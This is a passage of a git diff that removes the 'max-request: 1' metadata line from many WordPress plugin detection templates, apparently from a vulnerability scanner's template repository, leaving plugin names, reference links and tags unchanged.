--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
-    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 4ecac0cd92..8d7e45818b 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
-    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index e50f58cef8..ed3967db7b 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
-    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 031bb48563..2ff5adba86 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
-    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 3cdcf3da93..9099f3c0a5 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
-    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index c222bc9d4a..1ee0e67542 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
-    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index 9c6e3e6d2e..1778552d75 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
-    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 66b7d6a363..7ba81036cf 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index a36016562d..24fc3e3295 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
-    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 8033aacbc6..3e89505574 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e4017b1a0a..e701e365ba 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index 53d6d393bd..c0cc5400a8 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index c286e9a14f..22687bcffe 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
-    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index 364e3cd71e..b69d3d5bfe 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
-    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 4fcccbfc33..7975a57702 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index 3fbc714d3b..ff4cef94d7 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index c49b506979..a8903697b0 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
-    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index dfcaf6f71b..3f141c4476 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
-    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 61be246fee..5355e988a2 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
-    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 50d2e6630b..53d409fb68 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 8d71f7bde9..0e908a9580 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index 5e1f97086e..aeb1875c57 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
-    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index d87d456a8c..7c15702305 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
-    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index aa9153241e..5ce87e6c71 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
-    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index 09641796a3..c342e6b45a 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
-    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index 28b70d09bf..e95041f555 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
-    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index b43c10ed7a..879a0d1c12 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
-    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index eb7e78bc7f..985f5d373a 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
-    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index 3da2ea50e1..bbc305b8de 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
-    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7a58c58f63..7e3e4e2d7e 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
-    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 5f99b8cac8..17ea142c46 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
-    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index b08876df04..953e4ab3d8 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
-    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 3f68dffe06..92107fa69c 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
-    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 34f9bde1d6..5e1fe4ef5c 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
-    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index d9f645328f..74fb3e6010 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
-    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index 8a1196fc9f..b9f70ba555 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
-    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 05025452b7..6486c02c9a 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
-    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 1db1b57708..81f58198d3 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index dafe6974f6..3743307dbc 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
-    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index ba05fb1e16..a4c6980041 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
-    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index a038adac53..e085f30e5a 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index 7f98d822a8..adf3387ddb 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
-    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index 89602f4264..eb6e1aaa5d 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
-    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index 2f6513ca42..b3c83cd0bf 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
-    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 982306b13c..96d8bd6aca 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
-    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index fdcac13b56..85955ac95e 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index fc316f9f7a..a81fc892ca 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
-    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index 975b63f5de..d9c6052cd7 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index 5065659e82..afc1141e0c 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
-    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index 732ffbc4eb..d44add9ca6 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 12dffeb534..20ba5c2e16 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index ae0e76c4bb..cbcf3cf09d 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
-    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index b1718d1ccb..3311d42c94 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
-    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 7543ac1d55..46c1c22805 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 4a29cecdb0..7c13b8d2a4 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
-    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index be281d91e6..53b30ba721 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
